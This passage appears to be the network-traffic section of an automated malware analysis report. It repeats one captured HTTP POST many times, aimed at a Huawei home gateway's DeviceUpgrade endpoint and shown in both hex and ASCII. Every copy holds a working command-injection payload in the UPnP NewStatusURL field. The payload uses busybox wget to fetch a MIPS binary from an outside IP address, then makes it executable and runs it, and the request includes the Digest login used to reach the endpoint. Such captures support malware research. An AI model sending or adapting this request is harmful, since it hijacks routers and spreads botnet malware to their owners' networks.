63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
